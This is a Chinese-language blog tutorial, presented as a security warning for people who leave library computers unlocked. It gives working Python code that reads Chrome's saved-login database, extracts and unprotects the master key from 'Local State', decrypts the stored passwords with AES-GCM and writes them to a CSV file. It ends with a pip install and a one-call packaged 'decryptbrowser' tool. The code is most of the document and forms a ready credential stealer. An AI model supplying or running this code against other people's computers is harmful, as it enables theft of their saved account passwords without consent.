发现很多人在学校图书馆喜欢用电脑占座(以古度今,我好像好多年没去过学校图书馆了),而且出去的时候经常不锁屏,为了让大家养成良好的习惯,我来带大家写个小程序吧,无需输入任何密码就可以快速获取你存储在电脑浏览器中的所有账号和密码,算是通过实践出真知来给大家提个醒了~
废话不多说,让我们愉快地开始吧~
Python版本:3.7.8
相关模块:
pikachupytools模块;
pycryptodome模块;
以及一些python自带的模块。
安装Python并添加到环境变量,pip安装需要的相关模块即可。
众所周知,我们的浏览器里一般存储了很多我们访问过的网站的账号和密码:
一般情况下,查看这些密码是需要输入电脑的开机密码的。但是事实上,我们也可以通过其他方式直接查看这些账号密码。例如谷歌浏览器里保存账号密码的数据库文件默认路径为:
os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
我们可以通过读取该文件获得对应的账号密码:
'''读取数据库数据'''
def readdb(self, dbpath, master_key):
sql = 'SELECT origin_url, username_value, password_value, date_created, date_last_used FROM logins;'
client = sqlite3.connect(dbpath)
cursor = client.cursor()
with open(self.savename, 'a', newline='', encoding='utf-8-sig') as csv_file:
cursor.execute(sql)
csv_writer = csv.writer(csv_file, dialect=('excel'))
if not self.write_heads_flag:
csv_writer.writerow(self.csv_heads)
self.write_heads_flag = True
info = []
for row in cursor.fetchall():
for idx in range(len(self.csv_heads)):
if isinstance(row[idx], bytes):
info.append(self.decrypt(row[idx], master_key))
else:
info.append(row[idx])
csv_writer.writerow(info)
info = []
cursor.close()
client.close()其中密码是加密之后的结果,打印出来大概是这样子的:
但是解密其实也很简单,通过网上的资料可以知道,我们只需要获得key值:
'''获得master key'''
def getmasterkey(self, local_state_path):
import win32crypt
with open(os.environ['USERPROFILE'] + os.sep + local_state_path, 'r', encoding='utf-8') as fp:
local_state = fp.read()
local_state = json.loads(local_state)
master_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])
master_key = master_key[5:]
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key然后根据key值进行解码就行了:
'''解码'''
def decrypt(self, value, master_key):
print(value)
if value[:3] == b'v10':
from Crypto.Cipher import AES
iv, payload = value[3:15], value[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_value = cipher.decrypt(payload)
decrypted_value = decrypted_value[:-16].decode()
else:
import win32crypt
decrypted_value = win32crypt.CryptUnprotectData(value)[1].decode()
return decrypted_value解码之后的运行效果结果如下:
获得的结果默认保存在results.csv中,截图如下:
ok,大功告成啦,完整源代码详见相关文件。
想要快速测试的小伙伴只需要pip安装一下pikachupytools包:
pip install pikachupytools --upgrade
然后简单写几行代码就能调用运行了:
from pytools import pytools
tool_client = pytools.pytools()
tool_client.execute('decryptbrowser')
